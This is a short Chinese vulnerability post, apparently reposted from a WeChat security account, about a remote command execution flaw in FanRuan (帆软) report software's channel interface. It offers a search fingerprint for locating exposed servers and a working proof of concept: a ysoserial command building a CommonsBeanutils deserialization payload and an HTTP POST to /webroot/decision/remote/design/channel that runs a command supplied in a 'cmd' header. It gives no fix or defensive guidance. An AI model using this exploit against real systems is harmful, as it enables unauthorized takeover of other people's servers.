漏洞描述
帆软报表 channel 接口存在远程命令执行漏洞, 攻击者通过漏洞可以获取服务器权限,攻击服务器
漏洞影响
帆软报表
网络测绘
"Powered by 帆软"漏洞复现
登陆页面
验证POC
java -jar ysoserial-1.5-su18-all.jar -g CommonsBeanutils1183NOCC -p 'EX-TomcatEcho' -ch "cmd" > fine10.binPOST /webroot/decision/remote/design/channel HTTP/1.1Content-Type: application/jsonHost:cmd: idConnection: close{{gzip(file(fine10.bin))}}
感谢您抽出
.
.
来阅读本文
点它,分享点赞在看都在这里
文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247503760&idx=2&sn=91e2cf4ee6b8f278fd9a51711a84cbc2&chksm=9a68bb90c5bba679e61904e923ba738ef3cb8e39ccbae30b71b45aef12495f715b51a29f4f42&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh